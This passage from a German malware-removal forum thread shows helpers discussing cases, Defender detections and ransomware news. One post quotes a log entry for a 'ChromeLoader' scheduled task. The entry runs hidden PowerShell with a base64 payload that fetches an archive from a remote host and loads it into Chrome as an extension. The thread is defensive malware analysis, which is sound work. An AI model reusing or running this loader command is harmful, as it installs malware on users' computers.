Zurück   Trojaner-Board > Malware entfernen > Diskussionsforum

Diskussionsforum: Hinweise zu Ad/Malware Threads (bitte offen lassen)

Windows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben.

Antwort
Alt 18.06.2021, 17:33   #301
Yatagan
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Zu: https://www.trojaner-board.de/202053...ml#post1754321

Der Speicherort der Bilddateien sollte auffindbar sein:
https://www.sony.de/electronics/supp...icles/00049630

Oder sie liegen in der Sony Cloud.
__________________
"Consider again that dot. That's here. That's home. That's us. On it everyone you love, everyone you know, everyone you ever heard of, every human being who ever was, lived out their lives."— Carl Sagan

Alt 18.06.2021, 17:45   #302
webwatcher
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Zitat:
Wählen Sie den Ordner, in dem Sie die Videos und Fotos speichern möchten.
=d.h. in Zukunft

Frage ist, wie/ob bereits existierende Files verschoben/kopiert werden können,
da es anscheinend ein proprietäres Dateiformat ist.
__________________

__________________

Alt 18.06.2021, 18:43   #303
Yatagan
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Zitat:
Zitat von webwatcher Beitrag anzeigen
=d.h. in Zukunft
Es wird einen Default-Ordner geben, in den standardmäßig gespeichert wird. Der entsprechende Pfad sollte bereits als Zielverzeichnis hinterlegt sein und könnte auf die geschilderte Art und Weise auszulesen sein.
Inzwischen scheint der TO seine Daten ja gefunden zu haben, wenn er sie schon kopiert...
__________________
__________________

Alt 19.06.2021, 13:33   #304
webwatcher
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Nochmal zu ligafaktur: hat mir keine Ruhe gelassen und hab es deshalb mit Malwarebytes
gescannt und siehe da: auch mbam klassifiziert es als Malware
Irgendwas ist da oberfaul. Vielleicht hat ihm jemand ein faules Ei ins Nest gelegt.
Auf jeden Fall, so wie es z.Z aussieht: Finger weg und ab in die Tonne

Hab ihm das Ergebnis gemailt. Ist jetzt an ihm, ob/was er weiter unternehmen will.
__________________
Glaub ja nicht, was du denkst, wer ich bin

Geändert von webwatcher (19.06.2021 um 13:47 Uhr)

Alt 21.06.2021, 16:38   #305
webwatcher
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Defender hatte die *.exe als "Worm:Win32/Aicat.A!ml" erkannt.
Ist von Microsoft aus der Erkennung rausgenommen.
https://share-your-photo.com/1e110e8d23

__________________
Glaub ja nicht, was du denkst, wer ich bin

Alt 15.07.2021, 16:14   #306
webwatcher
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Falls sich jemand noch wundern sollte, warum Otto Normalo 3 Party AV einsetzt:
https://www.pcwelt.de/produkte/So_gu...t-8989347.html

Das wichtigste wird völlig unter den Tisch gekehrt: Unversehrtheit von Windows
__________________
--> Hinweise zu Ad/Malware Threads (bitte offen lassen)

Alt 19.07.2021, 10:41   #307
webwatcher
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Ein der besten Kommentare zum Crash in Anhalt -Bitterfeld> https://heise.de/-6141330


https://www.heise.de/forum/heise-onl...39289697/show/
Zitat:
Wobei ich anmerken möchte, dass das Management mit den Prämissen sehr unzufrieden war und das Problem auch erst nach sehr langen Erläuterungen verstanden hat. Es ist immer noch sehr unzufrieden, weil es eigentlich eine Wiederherstellung per Knopfdruck erwartet und sich darin auch durch - imho verantwortungslose - Produktwerbung auch bestärkt sieht.
Das läuft jetzt also nur deshalb so, weil sie keine Gegenmeinung eines Fachmanns dazu auftreiben konnten und die wiederholte Medienberichterstattung zu wochenlangen Ausfällen einen noch schlechteren Zeitablauf zeichnet, als er so realisiert werden kann.
Allerdings war es schwer, gegen das Vorurteil anzukommen, dass alle Betroffenen mit langen Ausfallzeiten nur Vollidioten sind, die kein Sicherungssystem bedienen können. Die Absurdität dieser Annahme hält die Leute ja nicht davon ab, sie trotzdem für valide zu erklären. Sonst müsste man sich ja echte Sorgen machen und das will man nicht.
https://heise.de/-6141310
Zitat:
Doch die Gefahr steige. Einigen Firmen müsse man die Dringlichkeit nach wie vor klarmachen.

"Es ist unmöglich, sich zu 100 Prozent zu schützen", räumt der VDMA-Experte ein. "Getroffen werden kann jeder, so wie jedes Immunsystem von einem Virus getroffen werden kann. Das gestiegene Bewusstsein muss aber auch zu Investitionen in mehr Sicherheit führen." Oft reagierten Unternehmen erst, wenn Hacker ihr Chaos schon angerichtet hätten und man nur noch reagieren könne. "Thema Nummer eins für die Maschinenbau-Branche ist jetzt die Cybersicherheit."
...
...
"Wir bewegen uns in einer Welt trügerischer Sicherheit", heißt es beim Niedersächsischen Städte- und Gemeindebund. "Auf Dauer hilft es uns nur, wenn wir wichtige Dinge in abgeschotteten Systemen bearbeiten."

Z., in dessen Verband sich Firmen zu einem Arbeitskreis gegen Netz-Erpressungen zusammengeschlossen haben, sieht das Kernproblem so: "Die Leichtsinnigkeit ist immer noch ein schwieriges Feld."
__________________
Glaub ja nicht, was du denkst, wer ich bin

Geändert von webwatcher (19.07.2021 um 11:04 Uhr)

Alt 21.10.2021, 09:41   #308
webwatcher
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



https://www.zeit.de/digital/2021-10/...hackerangriffe

Zitat:
BSI-Lagebericht 2021: Kritische Infrastruktur
Angreifer legen Krankenhäuser oder Verwaltungen lahm und gehen dabei immer professioneller vor. Die Bedrohung in Deutschland wächst, zeigt der Lagebericht des BSI.
Und die Türen weiter sperrangelweit offen:

IT-Sicherheit ist viiiel zu teuer

https://www.heise.de/news/IT-Sicherh...eitrag.beitrag
Zitat:
IT-Sicherheit: BSI warnt vor "Alarmstufe Rot"

Die Gesellschaft müsse angesichts anhaltender Bedrohungen etwa durch Ransomware und IT-Schwachstellen "wachsam und wehrhaft sein", fordert das BSI.
__________________
Glaub ja nicht, was du denkst, wer ich bin

Geändert von webwatcher (21.10.2021 um 10:19 Uhr)

Alt 22.10.2021, 14:27   #309
webwatcher
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

TrojanDownloader:O97M/EncDoc.RDU!MTB



https://www.trojaner-board.de/202881...ml#post1758433
Zitat:
Vielleicht handelt es sich bei der Meldung von WD auch um einen Fehlalarm. Und selbst wenn nicht, sonst ist da nichts zu sehen.
https://www.microsoft.com/en-us/wdsi...tID=2147753610
Zitat:
TrojanDownloader:O97M/EncDoc.RDU!MTB

Microsoft Defender Antivirus detects and removes this threat.

This threat downloads and installs other programs, including other malware, onto your PC without your consent.
Vom blauen Himmel wird der wohl kaum auf den PC gelangt sein...
__________________
Glaub ja nicht, was du denkst, wer ich bin

Geändert von webwatcher (22.10.2021 um 14:44 Uhr)

Alt 22.10.2021, 20:51   #310
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Zitat:
Zitat von webwatcher Beitrag anzeigen
Vom blauen Himmel wird der wohl kaum auf den PC gelangt sein...
Was sollen wir denn jetzt mit so einem Kommentar anfangen?
Niemand kann da eine 100%ige Aussage zu machen. Ich hätte jetzt den TO gefragt woher er diese Datei hat und zu was die gut ist (war!) aber die meisten wissen das ja nicht. Oder sagen dann, dass sie die schon ewig drauf haben, damit schon immer arbeiten aber dann doch löschen lassen.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 22.10.2021, 22:15   #311
webwatcher
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Wenn sie ihn "ewig" drauf gehabt hätte, sähe der PC vermutlich im Inneren etwas anders aus.
Zitat:
This threat downloads and installs other programs, including other malware, onto your PC without your consent.
Hat eben großes Glück gehabt, dass der Defender angeschlagen hat.
__________________
Glaub ja nicht, was du denkst, wer ich bin

Alt 22.10.2021, 22:20   #312
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Aber wenn die Leute damit arbeiten, dann doch weil sie so eine Datei selbst erstellen und/oder mit Leben füllen. Eigentlich hätte der TO diese Datei zur Verfügung stellen müssen, so bleibt alles unklar!
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 31.12.2021, 16:31   #313
webwatcher
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



https://www.trojaner-board.de/203241...ml#post1760771
Zitat:
Ich wende mich an euch, weil ich beim PC meiner Eltern, einen komischen Chronik Verlauf gefunden habe.
Ständig ist die Internetseite exsalut.com enthalten. Google liefert keine brauchbaren Ergebnisse und wenn man der Seite in der Chronik folgt, kommt man ins leere.
taucht schon früher im Board und im WWW auf

exsalut.com ist auf amazon registriert
https://stuffgate.com/exsalut.com
Zitat:
Registrar URL: http://registrar.amazon.com
Updated Date: 2020-05-18T12:48:18Z
Creation Date: 2020-05-18T12:37:17Z
Registry Expiry Date: 2021-05-18T12:37:17Z
Wozu die dient, ist unklar. Hab jedenfalls keinen Hinweis/Erklärung dazu gefunden.
Aufruf liefert eine leere Seite.
__________________
Glaub ja nicht, was du denkst, wer ich bin

Alt 06.01.2022, 08:43   #314
M-K-D-B
/// TB-Ausbilder
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Zitat:
Zitat von webwatcher Beitrag anzeigen
https://www.trojaner-board.de/203241...ml#post1760771

taucht schon früher im Board und im WWW auf

exsalut.com ist auf amazon registriert
https://stuffgate.com/exsalut.com


Wozu die dient, ist unklar. Hab jedenfalls keinen Hinweis/Erklärung dazu gefunden.
Aufruf liefert eine leere Seite.
Analog zu hier.

Alt 06.01.2022, 08:49   #315
M-K-D-B
/// TB-Ausbilder
 
Hinweise zu Ad/Malware Threads (bitte offen lassen) - Standard

Hinweise zu Ad/Malware Threads (bitte offen lassen)



Neue Malware (hab ich auch schon bei MB gesehen).

Link zum Thema


Zitat:
Task: {FF650B09-2BA7-407F-AD46-F0DDA995556C} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAE cAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBGAGkAbAB0AGUAcgAgACIAbgBhAG0AZQA9ACcAYwBoAHIAbwBtAGUALgBlAHgAZQAnACIAKQAg AHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAJAGkAZgAoACQAXwAgAC0ATQ BhAHQAYwBoACAAIgBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4AIgApAHsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAKAAkAJABpAHMATwBwAGUAbgAgAD0AIAAxADsACgB9AAoACgBpAGYA KAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAeAB0AFAAYQB0AGgAKQApAHsACgAKAAkACQAkAGEAcgBjAG gAaQB2AGUATgBhAG0AZQAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAGEAcgBjAGgAaQB2AGUALgB6AGkAcAAiAAoACgAJAAkAdAByAHkAewAKAAkACQAJ AHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBiAHIAbwBrAGUAbgBuAGEALgB3AG8AcgBrAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaA BpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIA YQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAKAAoACQB9AAoACgAJAH QAcgB5AHsACgAJAAkARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAYwBoAHIAbwBtAGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAEMAbABvAHMAZQBNAGEAaQBu AFcAaQBuAGQAbwB3ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAfQAKAAkACQBzAHQAYQByAHQAIABjAGgAcgBvAG0AZQAgAC0ALQBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4APQAiACQAZQ B4AHQAUABhAHQAaAAiACwAIAAtAC0AcgBlAHMAdABvAHIAZQAtAGwAYQBzAHQALQBzAGUAcwBzAGkAbwBuACwAIAAtAC0AbgBvAGUAcgByAGQAaQBhAGwAbwBnAHMALAAgAC0ALQBkAGkAcwBhAGIA bABlAC0AcwBlAHMAcwBpAG8AbgAtAGMAcgBhAHMAaABlAGQALQBiAHUAYgBiAGwAZQAKAAkAfQBjAGEAdABjAGgAewB9AAoACgB9AAoACgA= /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAE cAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAL (Der Dateneintrag hat 1683 mehr Zeichen). (Keine Datei) <==== ACHTUNG

CHR Extension: (Settings) - C:\Users\tilmu\AppData\Local [2022-01-05]

C:\Users\tilmu\AppData\Local\chrome

Zitat:
========================= Folder: C:\Users\tilmu\AppData\Local\chrome ========================

2022-01-04 10:51 - 2022-01-04 09:51 - 000010714 ____A [8FD91B4289AF2CAA8006118AA082F7B7] () C:\Users\tilmu\AppData\Local\chrome\background.js
2022-01-04 10:51 - 2022-01-04 09:51 - 000000221 ____A [1B92868D55E896DA6D17BFB900DE92CF] () C:\Users\tilmu\AppData\Local\chrome\conf.js
2022-01-04 10:51 - 2022-01-04 09:51 - 000000484 ____A [A71C82A6FFE68495546E7BB7D3F62A0C] () C:\Users\tilmu\AppData\Local\chrome\manifest.json
2022-01-04 10:51 - 2022-01-04 09:51 - 000003970 ____A [4E46AD8737DD28215F3C478EE8B01DC0] () C:\Users\tilmu\AppData\Local\chrome\settings.png

Antwort

Themen zu Hinweise zu Ad/Malware Threads (bitte offen lassen)
adobe, beachten, cloud, creative, downloader, eröffnung, folge, handel, hilfesuche, hilfesuchenden, hinweise, hoffnung, https, loader, lösung, meldung, meldungen, möglicher, neue, neuen, nicht, nichts, offen, offtopic, schei, standards, systemscan, thema, themas, thread, threads, troja, trojandownloader



Ähnliche Themen: Hinweise zu Ad/Malware Threads (bitte offen lassen)


  1. Hinweise zu Ad/Malware Threads
    Lob, Kritik und Wünsche - 07.09.2019 (74)
  2. Win10 Pro: Browser stürzen ab-(Chrome&Edge)-GGF Schädlingsbefall-(Hinweise: TR/Dropper.Gen & suspected of Malware.Agent.39 "PAK_Generic.008)
    Log-Analyse und Auswertung - 20.03.2018 (17)
  3. Anti Malware Programme lassen sich nicht mehr starten
    Plagegeister aller Art und deren Bekämpfung - 11.10.2017 (32)
  4. Channel 9: So lassen sich Systeme vor Malware und anderen Cyberattacken schützen
    Nachrichten - 05.10.2017 (0)
  5. Windows 8, Malware: Schrift verändert, Programme lassen sich nicht öffnen
    Log-Analyse und Auswertung - 24.05.2016 (19)
  6. Positive Finds lassen sich mit Anti-Malware nicht löschen
    Plagegeister aller Art und deren Bekämpfung - 01.03.2015 (13)
  7. Malware laufen lassen - hier ist das Log - Weather It Up und EnhanceTronic!
    Plagegeister aller Art und deren Bekämpfung - 22.03.2014 (11)
  8. Malware und Adware Einträge lassen sich nicht beheben; GMER Absturz
    Log-Analyse und Auswertung - 25.04.2013 (9)
  9. Windows 7 BKA 2.07 Logfiles erstellt Malware laufen lassen
    Log-Analyse und Auswertung - 02.08.2012 (8)
  10. mit der Bitte um weiterbearbeitung des Threads PumBadProxy I-Explorer geblocked
    Plagegeister aller Art und deren Bekämpfung - 10.07.2011 (3)
  11. Nach einer Malware attacke lassen sich einige Programme nicht mehr updaten
    Plagegeister aller Art und deren Bekämpfung - 04.01.2011 (49)
  12. Mehrere Hinweise auf Malware --> Schwarzes Dreieck neben AntiVir + Herunterfahren in 30 Sekunden
    Plagegeister aller Art und deren Bekämpfung - 30.11.2010 (28)
  13. Hinweise auf Viren, Trojaner, malware? z.b.
    Log-Analyse und Auswertung - 11.02.2010 (1)
  14. Google leitet falsch weiter/Anti-Malware Programme lassen sich nicht starten
    Plagegeister aller Art und deren Bekämpfung - 19.08.2009 (8)
  15. Bitte Dringend hilfe! (cmd netstat viele ports offen) normal?
    Überwachung, Datenschutz und Spam - 25.04.2009 (2)
  16. threads bewerten
    Lob, Kritik und Wünsche - 17.07.2003 (4)

Zum Thema Hinweise zu Ad/Malware Threads (bitte offen lassen) - Zu: https://www.trojaner-board.de/202053...ml#post1754321 Der Speicherort der Bilddateien sollte auffindbar sein: https://www.sony.de/electronics/supp...icles/00049630 Oder sie liegen in der Sony Cloud. - Hinweise zu Ad/Malware Threads (bitte offen lassen)...
Archiv
Du betrachtest: Hinweise zu Ad/Malware Threads (bitte offen lassen) auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.